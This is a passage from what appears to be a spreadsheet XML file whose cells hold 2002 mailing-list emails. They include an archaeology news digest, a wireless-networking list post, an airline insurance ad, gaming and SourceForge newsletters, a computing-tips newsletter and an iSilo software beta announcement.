seen by the public:http://www.ananova.com/news/story/sm_643946.htmlSanskrit is in danger of becoming extinct:http://news.bbc.co.uk/2/hi/south_asia/2173400.stmThere's a battle brewing over the fate of the "Welsh Mary Rose":http://www.guardian.co.uk/arts/news/story/0,11711,771543,00.html
http://news.bbc.co.uk/2/hi/wales/2183191.stm================================================================
THE AMERICAS
================================================================
There is evidence of pre-Columbian dentistry in Mexico:http://www.thenewsmexico.com/printedformat.asp?id=31882Bones found near Lake Jackson (Texas) might be 11,000 years old:http://www.chron.com/cs/CDA/printstory.hts/metropolitan/1528019A nice report on excavations near Fort Vancouver:http://www.canoe.ca/NationalTicker/CANOE-wire.Bay-Dig.htmlHome construction in Virginia has revealed the grave of a slave:http://story.news.yahoo.com/news?tmpl=story&amp;u=/ap/20020808/ap_wo_en_ge/us_slave_remains_1
================================================================
ON THE NEWSSTANDS
================================================================
A new issue of Bible Review, with online articles on a collection
of New Testament manuscripts, the Exodus debate, and other things:http://www.bib-arch.org/bswb_BR/indexBR.html... and Archaeology Odyssey, with articles on the ten most endangered
archaeological sites, Moses Shapira (wow), et alia:http://www.bib-arch.org/bswb_AO/indexAO.html
================================================================
ON THE WEB
================================================================
I came across the Into Archaeology website this week; it's worth a 
look for a number of reasons, but in particular its articles section
has some good stuff (currently, an interview with Adrienne Mayor, a
piece
on the Thera ships, and a piece on the work at Bird Cove):http://www.intoarch.com/The Oriental Institute has recently added a whole pile of publically-
accessible articles to its News and Notes section:http://www-oi.uchicago.edu/OI/DEPT/PUB/NewsAndNotes.html
================================================================
NEW ONLINE BOOKS
================================================================
George Dennis, *Cities and Cemeteries of Etruria*:http://www.ukans.edu/history/index/europe/ancient_rome/E/Gazetteer/Places/Europe/Italy/.Periods/Roman/Archaic/Etruscan/.Texts/DENETR*/home.htmlHorace, *Odes and Carmen Saeculare* (Conington trans.):http://digital.library.upenn.edu/webbin/gutbook/lookup?num=5432Horace, *Satires, Epistles, and Ars Poetica* (Conington trans.):http://digital.library.upenn.edu/webbin/gutbook/lookup?num=5419
================================================================
ON  THE ARCHAEOLOGY CHANNEL
================================================================
Calleva: The Roman Town of Silchester:http://www.archaeologychannel.org/
================================================================
CRIME BEAT
================================================================
There are claims that recent Al-Qaeda casualties were actually
potential antiquity thieves:http://europe.cnn.com/2002/WORLD/asiapcf/central/08/07/afghan.gunfights/index.html
================================================================
AT ABOUT.COM
================================================================
... can't seem to connect today (hmmmmm...)
================================================================
REVIEWS
================================================================
Iain Pears, *Dream of Scipio*:http://www.nytimes.com/2002/08/07/books/07PEAR.html
http://www.nytimes.com/2002/06/23/books/review/23CROWLET.htmlTony Perrottet, *Route 66 A.D.: On the Trail of Ancient Roman Tourists* http://seattletimes.nwsource.com/html/artsentertainment/134447835_route66ad05.htmlAnton Powell, * Athens and Sparta: Constructing Greek political and
social history from 478 BC*http://www.athensnews.gr/athweb/nathens.print_unique?e=C&amp;f=12974&amp;m=A19&amp;aa=2&amp;eidos=SAntigone (Epidavros):http://www.ekathimerini.com/4dcgi/news/content.asp?aid=19644================================================================
EXHIBITIONS
================================================================
Treasures from a Lost Civilization (Toronto):http://story.news.yahoo.com/news?tmpl=story&amp;u=/nm/20020809/wl_canada_nm/canada_arts_china_col_1
================================================================
CLASSICIST'S CORNER
================================================================
Famed debunker James Randi has been running a series on Lucian's
debunking of  Alexander of Abonutichus which is worth a look. 
It's in four parts (you'll have to skim through some other, readable,
stuff to get to the bits on Lucian ... it tends to be near the end):http://www.randi.org/jr/071902.html
http://www.randi.org/jr/072602.html
http://www.randi.org/jr/080202.html
http://www.randi.org/jr/080902.htmlIn case you meet someone who asks, "What's all the hubbub about those
Elgin Marbles?", here's a nice article to hand them:http://www.japantimes.co.jp/cgi-bin/getarticle.pl5?fv20020806a1.htmClassical precedents cited in a piece on gossip:http://www.nytimes.com/2002/08/10/arts/10GOSS.htmlLatin content in a story of a man with way too much time on his hands:http://www.guardian.co.uk/international/story/0,3604,770241,00.htmlHow not to pursue a classics degree:http://www.thisisoxfordshire.co.uk/oxfordshire/news/NEWS6.htmlSome guy is studying why ancient Greek buildings seem to do so well
in earthquakes (do they?):http://www.ekathimerini.com/4dcgi/news/content.asp?aid=19704A reader alerted me to LewRockwell.com, this week, which is a political
site which at least one item of interest ... a piece by Daniel
McCarthy on Greek ideas of liberty:http://www.lewrockwell.com/dmccarthy/dmccarthy35.htmlPlenty of ClassCon in a Newsweek piece "Why We Need Heaven":http://www.msnbc.com/news/789252.asp... and a reason for studying Latin and Greek in an interview with
David McCollough:http://www.neh.gov/news/humanities/2002-07/danger.htmlNot sure whether there's comparanda potential in this bit on the 
crowning of King Puck:http://story.news.yahoo.com/news?tmpl=story2&amp;cid=856&amp;ncid=856&amp;e=1&amp;u=/nm/20020810/od_uk_nm/oukoe_ireland_puck_1Peter Jones in the Spectator (there's a Hannibal movie coming!):http://www.spectator.co.uk/article.php3?table=old&amp;section=current&amp;issue=2002-08-10&amp;id=2137... and Dot Wordsworth:http://www.spectator.co.uk/article.php3?table=old&amp;section=current&amp;issue=2002-08-10&amp;id=2138Perfess'r Harris' Classics Corner:http://www.realchangenews.org/issue/current/classics/classics_corner.htmlRadio Finland's Nuntii Latini
http://www.yle.fi/fbc/latini/trans.htmlRadio Bremen's Der MonatsrÃ¼ckblick - auf Latein 
http://www.radiobremen.de/online/latein/U.S. Weather in Latin:
http://latin.wunderground.com/
================================================================
FOLLOWUPS
================================================================
Ancient Chinese Mail:http://www.guardian.co.uk/china/story/0,7369,770922,00.htmlBirth Bricks:http://www.nytimes.com/2002/08/06/science/social/06BRIC.html?ex=1029729600&amp;en=cbb6833f14483e22&amp;ei=5040&amp;partner=MOREOVER"Hidden Nazi Gold":http://www.nytimes.com/aponline/international/AP-Germany-Nazi-Gold.html
http://www.heraldsun.news.com.au/common/story_page/0,5478,4859169%255E663,00.html
http://www.haaretzdaily.com/hasen/pages/ShArt.jhtml?itemNo=195691&amp;contrassID=1&amp;subContrassID=8&amp;sbSubContrassID=0&amp;listSrc=YMonitor (the coverage varies quite a bit in these):http://www.cnn.com/2002/US/08/05/uss.monitor.ap/index.html
http://www.nytimes.com/2002/08/09/science/09MONI.html
http://story.news.yahoo.com/news?tmpl=story&amp;u=/ap/20020805/ap_on_go_ca_st_pe/uss_monitor_5
http://www.msnbc.com/news/789905.aspNinkasi Beer:http://story.news.yahoo.com/news?tmpl=story&amp;u=/nm/20020806/od_uk_nm/oukoe_britain_beer_1Old Chess Piece:http://portal.telegraph.co.uk/news/main.jhtml?xml=%2Fnews%2F2002%2F08%2F06%2Fwchess06.xmlReplica Egyptian Tombs:http://www.ahram.org.eg/weekly/2002/598/hr1.htmReturn of Ramses I:http://www.theartnewspaper.com/news/article.asp?idart=9856Return of Roman sculpture by Princeton:http://www.theartnewspaper.com/news/article.asp?idart=9855Roman Plane from York:http://www.fragmentsoftime.com/new_page_8.htmVinland Map:http://story.news.yahoo.com/news?tmpl=story2&amp;cid=624&amp;ncid=624&amp;e=12&amp;u=/ap/20020730/ap_on_sc/vinland_map_3
================================================================
EXPLORATOR is a weekly newsletter representing the fruits of
the labours of 'media research division' of The Atrium. Various
on-line news and magazine sources are scoured for news of the
ancient world (broadly construed: practically anything relating
to archaeology or history  prior to about 1700 or so is fair
game) and every Sunday they are delivered to your mailbox free of
charge!
================================================================
Useful Addresses
================================================================Past issues of Explorator are available on the web at:
http://groups.yahoo.com/group/Explorator/messagesTo subscribe to Explorator, send a blank email message to:
mailto:Explorator-subscribe@yahoogroups.comTo unsubscribe, send a blank email message to:
mailto:Explorator-unsubscribe@yahoogroups.comTo send a 'heads up' to the editor:
mailto:dmeadows@idirect.com================================================================
Explorator is Copyright (c) 2002 David Meadows. Feel free to
distribute these listings via email to your pals, students,
teachers, etc., but please include this copyright notice. These
listings are not to be posted to a website; instead, please
provide a link to the past issues and/or the media archive
mentioned above. Thanks!
================================================================------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
4 DVDs Free +s&amp;p Join Now
http://us.click.yahoo.com/pt6YBB/NXiEAA/RN.GAA/7gSolB/TM
---------------------------------------------------------------------~-&gt;To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Ripped fromhttp://www.hpl.hp.com/personal/Jean_Tourrilhes/Linux/Linux.Wireless.usage.html" 11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NAT/masquerading and PPP configuration.The conventional Ethernet bridging method (promiscuous sniffing) doesn't 
work with most wireless LAN standard, because of the header encapsulation 
and the interactions with link layer retransmissions. In other word, most 
often, when you use a software bridge on a wireless LAN (such as the Linux 
bridge on a 802.11 card), it doesn't work (moreover, quite often promiscuous 
is broken as well). "[[ What the?? What is he talking about?? Aren't we all using Linux to bridge 
our networks? ]]" The driver could work around this restriction by creating its own MAC 
headers (802.11 headers instead of 802.3, and putting the right bits in the 
right place), but in fact most vendors don't provide the specification on 
how to this with their hardware (when they don't explicitely prevent it in 
hardware, to force you to buy their Access Points).In other words, don't expect to use your Linux PC as a wireless bridge or 
wireless Access Points with most products out there, and forget about 
turning it into an Access Point. Of course, there is some exceptions. "[[ Is this true? ]]
" The workaround is to set the wireless LAN in ad-hoc mode and to use other 
methods, such as routing, masquerading, IP bridging, ARP proxying... "
[[ Yes, I am in a process of building a wireless-lan &lt;-&gt; wired-lan bridge. 
But I don't understand what this guy is talking about. Anyone?
Vince. ]]
_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspx
To unsubscribe: send mail to majordomo@wireless.org.au
with "unsubscribe melbwireless" in the body of the message
</t>
  </si>
  <si>
    <t xml:space="preserve">Ryanair in partnership with Primary Insurance
offer excellent value travel insurance from
Â£7.00GBP/9.00 Euro per person for 31 day cover.Annual travel insurance* from Â£45.00GBP/63.00 Euro,
includes 24 days winter sports cover !Our travel insurance provides a high standard of cover.Summary of Cover
Medical Expenses up to Â£2 million
Personal Liability  up to Â£2 million
Personal Effects &amp; Baggage up to Â£750
Personal Accident Maximum Benefit Â£15,000
Hospital Benefit up to Â£300
Cancellation up to Â£500
Curtailment up to Â£500
Travel Delay up to Â£60
Missed Departure up to Â£300
Personal Money up to Â£500
Legal Expenses up to Â£5000
Holiday Abandonment up to Â£500All figures in Sterling poundsTo book your Primary travel insurance policy
click http://www.primarytrade.co.uk/internetsales/ryanair/or call Ryanair Direct Reservations now on:0871 246 0002 (UK)	0818 304 304 (IRELAND)Primary Insurance also offer excellent rates onGolf Insurance from Â£15.00GBP/19.00 Euro
per passenger for 31 day coverSki insurance from Â£35.00GBP/45.00 Euro
per passenger for 31 day coverCover is only available to habitual residents of the UK and Ireland.*only available through the web.
====================================================================E-MAIL DISCLAIMERThis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unlawful.If you have received this e-mail in error
please notify Ryanair Holdings plc by emailing postmaster@ryanair.ie
or contact Ryanair Holdings plc, Dublin Airport, Co Dublin, Ireland.=====================================================================E-MAIL DISCLAIMERThis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unlawful.If you have received this e-mail in error 
please notify Ryanair Holdings plc by emailing postmaster@ryanair.ie
or contact Ryanair Holdings plc, Dublin Airport, Co Dublin, Ireland.  
---
You are currently subscribed to customers as: zzz-ryanair@spamassassin.taint.org
To unsubscribe send a blank email to leave-customers-949326K@mail.ryanairmail.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Reflexive Entertainment's Ion Hardie gives us a behind-the-scenes
look at the development of this high-fantasy RPG.
http://clickthru.online.com/Click?q=96-pjnWQtdhIRjzDLPjBQ-faEea09RR Knights of the Old Republic Delayed
Anarchy Online booster packs revealed, Stronghold: Crusader demo
released, Cultures 2 ships, Funcom gets new CEO, and MORE PC NEWS.
http://clickthru.online.com/Click?q=ab-ZcXKQYpMiyC0fCnXDRF5JtAnssRR Gamer Anthopology 101
This week our editors discuss the language of gamers, bad voice
acting, and more.
http://clickthru.online.com/Click?q=c0-kfy-QWP1dMP-ckw4_3rvnmcUHsRR &lt;---------------Advertisement---------------&gt;Gateway Back to School Deals The Gateway 400 Notebook makes Intel(R) Pentium(R) 4 
power both portable and affordable. With its available 
15" display and 2.0GHz processor, the Gateway 400 makes
an excellent system for students and teachers.  Only $1399
after $100 mail-in rebate.  click here for details!http://clickthru.online.com/Click?q=d6-yw3KQMPMLamOaNrnsqldgamSV9RR &lt;-------------------------------------------&gt;Sign up for GameCreds Today! 
Get access to hot new special offers on games like Neverwinter
Nights and more.
http://clickthru.online.com/Click?q=eb-HlLoQkDTMUDklrede0fdic3J99RR Play Battlefield 1942 for Free!
Explore the gritty trenches of World War II in this wild land,
air, and sea shooter for free.
http://clickthru.online.com/Click?q=00-4FXlI9QDZj_cENcbwnc-uevPYsRR *****************************************************PS: The e-mail address for your subscription is:
ericliu@neto.net
To ensure prompt service, please include this address, exactly as 
it appears above, in any correspondence to us.You're receiving GameSpot PC Games Newsletter because you 
subscribed to it. To unsubscribe, go to
http://clickthru.online.com/Click?q=15-mYR_zDcPljv7KCt4VxtoEFjtqDwS To switch to the weekly digest, go to
http://clickthru.online.com/Click?q=2a-CNeWIrIWMzpvOQGai1XJQ_FXjdRR Copyright 2002 CNET Networks, Inc. All rights reserved. Gamespot is a registered service mark of CNET Networks, Inc.
**zd_gif**
</t>
  </si>
  <si>
    <t>(You are receiving this email because you subscribed to it (honest).
For information on how to unsubscribe please read the bottom of this
email).0. INTRO.  [IBM DB2]
1. INCREASED DOWNLOAD CAPACITY.
2. AUDIO OF KERNEL SUMMIT AVAILABLE.
3. BE A SF.NET FOUNDRY GUIDE.
4. WORK FOR SOURCEFORGE.NET
5. SITE STATISTICS
0. INTROHello SourceForge.net Users,This week we've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SourceForge.net is a database-
dependent website.Today we have announced that we are moving SourceForge.net to DB2,
a powerful relational database by IBM.  We are doing this because
the site continues to grow at a rapid rate, with 700 new users and
70 new projects a day, and we need a database that can handle this
growth.  We feel that DB2 can do this for us, and IBM is giving us
the resources to make this transition successful.  You can read the
press release here:http://www.vasoftware.com/news/press.php/2002/1070.htmlHow will this effect you?  In the first phase, you won't see much
difference other then the site will continue to grow and the
SourceForge.net team will be able to handle the growth.  In later
phases you will see new features on the site that take advantage of
the databases advanced capabilities.Today our mail archives have been converted over.  The rest of the
site will make the migration to DB2 in the coming months.If you have questions about this or any other aspect of the site,
please feel free to email me, pat@sourceforge.net.  I always
appreciate the feedback.Thank you for your continued support of SourceForge.net and the
Open Source Community.Pat-Patrick McGovern
Director, SourceForge.net1. INCREASED DOWNLOAD CAPACITYSourceForge.net continues to grow, and it's appetite for bandwidth
is never-ending.  Every day SF.NET serves over 300,000 files to
ensure that developers and end-users within the Open Source
community can always obtain the software released by hosted
projects, SourceForge.net maintains a network of high-capacity
download servers.  These servers are located throughout the world,
as to provide better download times regardless of which network
provider you are using, and regardless of your geographic location.Three new download servers have recently been added to our network,
further strengthening our file serving capabilities.  These latest
additions include servers hosted by:Time Warner Telecom (Wisconsin,USA);
http://www.twtelecom.com/University of Minnesota (Minnesota, USA)
http://www.umn.edu/CESNET (Czech Republic)
http://www.cesnet.cz/We thank these sponsors for their commitment to SourceForge.net and
the needs of the Open Source community.On a related note, we are looking for a mirror in Japan.  If you are
an ISP or University in Japan and are willing to spare 20Mbps for a
SourceForge.net mirror (we'll supply the hardware), please let us
know at bandwidth@sourceforge.net2. AUDIO OF KERNEL SUMMIT AVAILABLESourceForge.net now has the audio from the entire 2002 OSDN/USENIX
Kernel Summit, held in June.  Listen to the Linux kernel master
discuss such hot topics as kernel modules, virtual memory,
block I/O, database scaling, security modules, and async I/O.
You may find this audio repository at:http://linuxkernel.foundries.sourceforge.net/article.pl?sid=02/06/26/01162253. CONTRIBUTE TO SOURCEFORGE.NET! BE A FOUNDRY GUIDE!Want to contribute to SourceForge.net, but you don't know how to
code? Be a foundry guide!  Foundry guides get to hype the cool
projects that they think are worth downloading and testing.
A guide finds all the stuff on the web about their subject of
choice, and gives it prominent placement.  How do you become a
foundry guide? Go to http://foundries.sourceforge.net/; find a
topic that interests you; and send email to
foundries@sourceforge.net stating your desired topic and why you
are qualified to be a foundry guide.4. WORK FOR SOURCEFORGE.NETWe have a new position for a senior web developer available at
SourceForge.net.  We are looking for someone to help us maintain,
upgrade, and add new features to SourceForge.net.  Ideal person has
5+ years of development experience on high end, high volume
websites (3+ million page views a day).  Has a vast level of
knowledge of Internet technologies:  PHP, PostgreSQL, MySQL, DB2,
Linux, PERL, Apache, LDAP, Mailman.  A flare for design / UI is a
bonus.  SourceForge is a unique site with unique challenges.  We are
looking for someone at the top of their game.Location of Job is in Fremont, California.  Please send resume and
URL's of sites you have worked on to jobs@sourceforge.net.  Text
resumes only.  (No MS WORD files!)5. SITE STATISTICSStats: (Monday 12th, 2000)
Hosted Projects: 45,194
Registered Users: 465,530
Page Views: 3,344,708 in a single day (Monday)
Files transfered in a single day: 340,838 (Monday)
Emails sent in a single day from Mailing lists: 851,143 (Monday)
Top Ten Projects1 phpMyAdmin
http://sourceforge.net/projects/phpmyadmin/
phpMyAdmin is a tool written in PHP intended to handle the
administration of MySQL over the WWW.  Currently it can create and
drop databases, create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields.2 Compiere ERP + CRM Business Solution
http://sourceforge.net/projects/compiere/
Smart ERP+CRM solution for small-medium enterprises (SME) in the
global marketplace covering all areas from customer management,
supply chain and accounting.  For $2-200M revenue companies looking
for "brick and click" first tier functionality.3 SquirrelMail
http://sourceforge.net/projects/squirrelmail/
SquirrelMail is a PHP4-based Web email client.  It includes built-in
pure PHP support for IMAP and SMTP, and renders all pages in pure
HTML 4.0 for maximum compatibility across browsers.  It also has
MIME support, folder manipulation, etc4 TUTOS
http://sourceforge.net/projects/tutos/
TUTOS is the ultimate team organization software, a web-based
groupware or ERP/CRM system to manage events/calendars, addresses,
teams, projects,tasks,bugs,mailboxes,documents and your time spent
with these things5 JBoss.org
http://sourceforge.net/projects/jboss/
The JBoss/Server is the leading Open Source, standards-compliant,
J2EE based application server implemented in 100% Pure Java6 Firewall Builder
http://sourceforge.net/projects/fwbuilder/
Object-oriented GUI and set of compilers for various firewall
platforms.  Currently implemented compilers for iptables, ipfilter
and OpenBSD pf7 openMosix
http://sourceforge.net/projects/openmosix/
openMosix is a Linux kernel extension for single-system image
clustering.  Taking n PC boxes, openMosix gives users and
applications the illusion of one single computer with n CPUs.
openMosix is perfectly scalable and adaptive.8 CDex
http://sourceforge.net/projects/cdexos/
CDex a CD-Ripper, thus extracting digital audio data from an Audio
CD. The application supports many Audio encoders, like MPEG
(MP2,MP3), VQF, AAC encoders.9 phpChrystal - An Open Intranet System
http://sourceforge.net/projects/phpchrystal/
phpChrystal ist ein OpenSource-Intranetsystem welches vorrangig auf
Lan-Partys eingesetzt werden kann.  Vorteile von phpChrystal sind
seine Portierbarkeit, Flexibilitï¿½t und Performance, da es vollends
auf PHP, MySQL und XML basiert10 Dev-C++
http://sourceforge.net/projects/dev-cpp/
Dev-C++ is an full-featured Integrated Development Environment
(IDE) for Win32 and Linux.  It uses GCC, Mingw or Cygwin as
compiler and libraries set.More Top Projects:
http://sourceforge.net/top/mostactive.php?type=weekEMAIL LIST REMOVAL:When the SF.NET team sends out a site-wide email, we sometimes see
replies that look like this:  "Hey!! I didn't subscribe to this list!!!
You spammer. I hate you!  I hate your dog!  (insert other colorful
phrases here)".  The truth is, when you registered on SourceForge.net
there was a check box that said "Receive Site-wide updates, low
volume".  You left it checked when you submitted the registration form,
hence you are receiving this email.  We send these updates every 4 to 6
weeks, so it truly is low volume.  However if you want off, this is not
a problem.  Simply click on the link below.
==================================================================
You receive this message because you subscribed to SourceForge
site mailing(s). You may opt out from some of them selectively
by logging in to SourceForge and visiting your Account Maintenance
page (http://sourceforge.net/account/), or disable them altogether
by visiting following link:</t>
  </si>
  <si>
    <t xml:space="preserve">IN THIS ISSUE:01. Secure IE
02. Disk cleanup on XP
03. Thanks but no thanks
04. Mouseless way home
05. Kartoo
06. XP time feature
07. Leaf Peeper Alert
08. Saving scraps
09. Quick access
10. Don't believe your emailAnd What's Coming Up Next Week in NNT Premium01. SECURE IE.  For the past month or so, our Software Review Panel has 
been giving a grueling test to Secure IE, a piece of software that blocks 
Flash and pop-ups,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http://www.NeatNetTricks.com/SoftwareReviews .  For a free trial download, 
visit http://www.secureie.com .  And if this one sweeps you off your feet, 
go to the NNT Store at http://www.NeatNetTricks.com/store and get a super 
deal, just $17.50 if you order before September 14.  With a 30-day 
guarantee, what's to lose?02. DISK CLEANUP ON XP.  Windows XP users can do some fast cleaning chores 
with Disk Cleanup.  Access this tool from the Start menu by right clicking 
on your hard drive.  Then select Properties and click on the Disk Cleanup 
button to determine how many files can be safely deleted.03. THANKS BUT NO THANKS.  Continuing our periodic feature of 
less-than-useful sites on the Web:  The International Center for Bathroom 
Etiquette at http://www.icbe.org/ gets our recognition this issue.  It says 
it's working hard to bring you the latest in cutting edge research and 
technology regarding bathroom etiquette.  We'll resist some obvious puns.. . . . .West Virginia's Diane Stratton recommended NNT to some friends and is now 
enjoying QuicKeys 2.0, a great Windows management software package.  Diane 
is our latest winner and you could be next.  Just go to the NNT Web site at 
http://www.NeatNetTricks.com and click on "Recommend NNT."  Nothing could 
be easier.. . . . .04. MOUSELESS WAY HOME.  To go home quickly in Internet Explorer, touch F6 
to highlight the Address Bar and type two periods (..) there.  The Enter 
key then takes you home.05. KARTOO.  Search engines are everywhere on the Internet but Kartoo at 
http://www.kartoo.net is quite unusual.  It's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 . . .You should make it a habit to visit the NNT Store at 
http://www.NeatNetTricks.com/store . We try to have several great products 
there at a limited-time price much less than anywhere else on the Net. 
Currently, you'll find excellent ebooks, a very effective popup stopper, 
and the very useful utility described in item 01 above, along with the 
usual opportunity to subscribe to NNT Premium and ArchivesExpress.  Check 
us out, you'll be glad you did.. . . . .06. XP TIME FEATURE.  Windows XP added a nice feature that heretofore 
required a separate software application.  It will connect, either at a 
programmed time or manually, to a time server via the Internet and reset 
that often erroneous internal clock.  Just click on the time in the systems 
tray, go to Date and Time Properties and click the Internet Time tab.07. LEAF PEEPER ALERT.  A bit early, but soon the changing colors of autumn 
will begin here in the U.S.  For those who like to follow the display, 
consider http://www.stormfax.com/foliage.htm for a comprehensive collection 
of links and toll-free numbers to each state to determine peak color times.08. SAVINGS SCRAPS.  Some oldies are worth repeating.  If you're working 
with text in, for example, MS Word or WordPad, and would like a handy way 
to save a portion for later easy retrieval, just select (highlight) it and 
click/drag it to your desktop.  When the newly created icon is clicked on, 
it will show the application with which the scrap was created, along with 
the first few words of the text.  A double click opens the text in the 
application with which it was created.09. QUICK ACCESS.  To go to a frequently used program, you may find 
yourself drilling down to the desktop and searching out the shortcut 
icon.  Consider instead setting up a key combination that will provide 
quick access without using the shortcut. Right click on the shortcut and 
select Properties.  In the Shortcut key window, select any key you can 
remember and click OK.  Ctrl+Alt and that key will open the application 
whenever needed.10.  DON'T BELIEVE YOUR EMAIL.  We've been asked about those emails with 
virus attachments that appear to be coming from NNT, asking for a 
confirmation of a subscription.  Don't believe it, and don't open the 
attachments.  Maybe this exchange between NNT and Lyris (our mail manager) 
will clear things up:NNT: Is there anything that can be done about the current strains of virus 
that implant on address books and randomly send email asking alleged 
subscribers to verify their subscription (when they haven't subscribed at 
all)? I've received some of these as well, and I know it's become a 
widespread problem with other ezine publishers, creating a lot of ill will 
all around.  Is there some configuration that we could change to keep 
these from going out except to legitimate subscribers?Lyris:  Unfortunately, there isn't much we can do about this since it 
isn't actually ListManager doing the sending.  The real problem is that 
people sometimes will add the "join" address to their address book and 
that is what causes the problems.  The best we can do is advise people not 
to have their address books set to automatically add any email address 
that they send a message to even once.  The main culprit here seems to be 
Outlook Express.WHAT'S COMING NEXT WEEK:  Another batch of Neat Net Tricks in the Premium 
issue, including:*  A great collection of information and free downloads to make your system 
more secure.*  Free software to measure and display your real-time Internet speed.*  Can you handle still another popup stopper - that's interference free - 
and at no cost?*  An easy-to-use tool to store and arrange all your passwords, user IDs, 
and other info.*  A Microsoft Word tip to easily work around that pesky autocompletion 
feature.*  A whole arsenal of tools to combat spam.*  Software that provides more than 200 interesting facts about your 
computer and displays about your CPU, memory, operating system, and your 
computer's power source.*  Our in-depth article discusses how to best manage our important 
passwords and get out of trouble when we -inevitably - forget those passwords.And more!  If you haven't subscribed yet, you won't find a better source of 
useful information for just 42 cents per issue.  That's $10 for a year's 
worth - 24 issues - at the NNT Store, http://www.NeatNetTricks.com/store .. . . . . .NNT makes no endorsement or warranty, expressed or implied, with regard to 
featured products or services. Results may vary based on operating systems 
and other variables beyond our control.For info on how to subscribe, unsubscribe, or change your address, send a 
blank email to info-neatnettricks@silver.lyris.net .Sponsor an entire issue of NNT with your exclusive message to our readers 
at very low rates. Send a blank email to 
advertise-neatnettricks@silver.lyris.net .Comments or questions about your computer and the Internet? Visit the NNT 
Bulletin Board at http://www.escribe.com/computing/neatnettricks/bb/ .NNT is hosted by Lyris.com, the best in email list management.Copyright 2002 by Jack Teems. All rights reserved. Neat Net Tricks is 
registered with the U.S. Library of Congress ISSN: 1533-4619. 
---
You are currently subscribed to neatnettricks as: xxxxxxxxxxxxxxxxx-neatnettricks@spamassassin.taint.org
To unsubscribe send a blank email to leave-neatnettricks-2424157K@silver.lyris.net
</t>
  </si>
  <si>
    <t>----------------------------------------------------------------------
1. iSilo(TM) 3.2 for Palm OS and Pocket PC enters beta1
2. iSilo(TM) 3.2 for Windows enters beta1
3. iSiloX 3.2 for Windows and Mac OS enters beta1
4. iSiloXC 3.2 for Windows, Linux, FreeBSD, Mac OS X,
   and Solaris enter beta1
----------------------------------------------------------------------======================================================================
1. iSilo(TM) 3.2 for Palm OS and Pocket PC enters beta1
----------------------------------------------------------------------
iSilo(TM) 3.2b1 adds the following new features to iSilo 3.15:- A System Information dialog, accessible from either the document
  list view or while viewing a document through the Tools menu.
  The dialog displays the user name (e.g., owner name) and the
  associated user ID of the device.  For Palm OS, the dialog also
  displays the free and total amount of dynamic and storage memory.
- Support for iSiloX/iSiloXC generated password protected documents.
  The password protection is embedded into the document during
  conversion and can not be modified nor removed from the converted
  document.
- Support for iSiloX/iSiloXC generated registration code protected
  documents. The registration code protection is embedded into the
  document during conversion.
- Support for iSiloX/iSiloXC generated documents that include an
  expiration date. The expiration date is embedded into the document
  during conversion.
- Support for displaying Title, Author, and Publisher information
  messages through the Document Information dialog accessible through
  the Edit menu while viewing a document.Please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iSilo(TM) 3.2b1 for Palm OS(R), please go to this URL:    To download iSilo 3.2b1 for Pocket PC, please go to this URL:    
======================================================================
2. iSilo(TM) 3.2 for Windows enters beta1
----------------------------------------------------------------------
iSilo(TM) 3.2 will be the first version of iSilo for Windows
and has the requirements shown here.Basic requirements:
- Pentium or comparable processor
- Windows 95 with Internet Explorer 4.0.1 or later, Windows 98,
  Windows Millennium, Windows NT 4.0 with Service Pack 6,
  Windows 2000, or Windows XP
- 16MB of RAM for Windowsr 95 and Windows 98 (32MB recommended),
  32MB of RAM for Windows Millennium and Windows NT 4.0,
  64MB of RAM for Windows 2000 and Windows XP
- 5MB of available hard-disk space for installationAdditional functionality specific requirements:
- Additional memory required for document storage.
- iSiloX required for creating documents utilizing maximum document
  presentation capabilities.Please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 3.2b1 for Windows, please go to this URL:    
======================================================================
3. iSiloX 3.2 for Windows and Mac OS enters beta1
----------------------------------------------------------------------
iSiloX 3.2b1 adds the following features to iSiloX 3.15:- In the Security properties, added support for protecting a document
  with any or all of a password, registrationn code, and expiration
  date.
- Added a Messages property page for specifying title, author,
  publisher, password, registration code, and expiration date
  messages for the document.
- Added cookie support and a Cookies property page for managing
  cookies.Please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 3.2b1 for Windows, please go to this URL:    To download iSiloX 3.2b1 for Mac OS, please go to this URL:    
======================================================================
4. iSiloXC 3.2 for Windows, Linux, FreeBSD, Mac OS X,
   and Solaris enter beta1
----------------------------------------------------------------------
iSiloX 3.2b1 adds the following features to iSiloX 3.15:- Added , , and  container
  elements under the  element for protecting a
  document with any or all of a password, registration code, and
  expiration date. See .ixl file format for more information.
- Added  element for specifying title, author, publisher,
  password, registration code, and expiration date messages for the
  document. See .ixl file format for more information.
- Added cookie support and the  element for managing
  cookies. See .ixl file format for more information.Please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iSiloXC 3.2b1 for Windows, please go to this URL:    To download iSiloXC 3.2b1 for Linux, please go to this URL:    To download iSiloXC 3.2b1 for FreeBSD, please go to this URL:    To download iSiloXC 3.2b1 for Mac OS X, please go to this URL:    To download iSiloXC 3.2b1 for Solaris, please go to this URL:    
----------------------------------------------------------------------
You have received this message because you subscribed to the
iSilo(TM) mailing list.  If you would like to be removed from
this list, please send an email with the subject "unsubscribe"
to: .Please note that this email address only handles subscriptions
and unsubscriptions of the mailing list.  Any other messages
sent to this email address are automatically deleted.----------------------------------------------------------------------
iSilo(TM)             http://www.iSilo.com             email@iSilo.com</t>
  </si>
  <si>
    <t xml:space="preserve">----------If your day starts with a tee time, then visit our Golf Section. weather.com
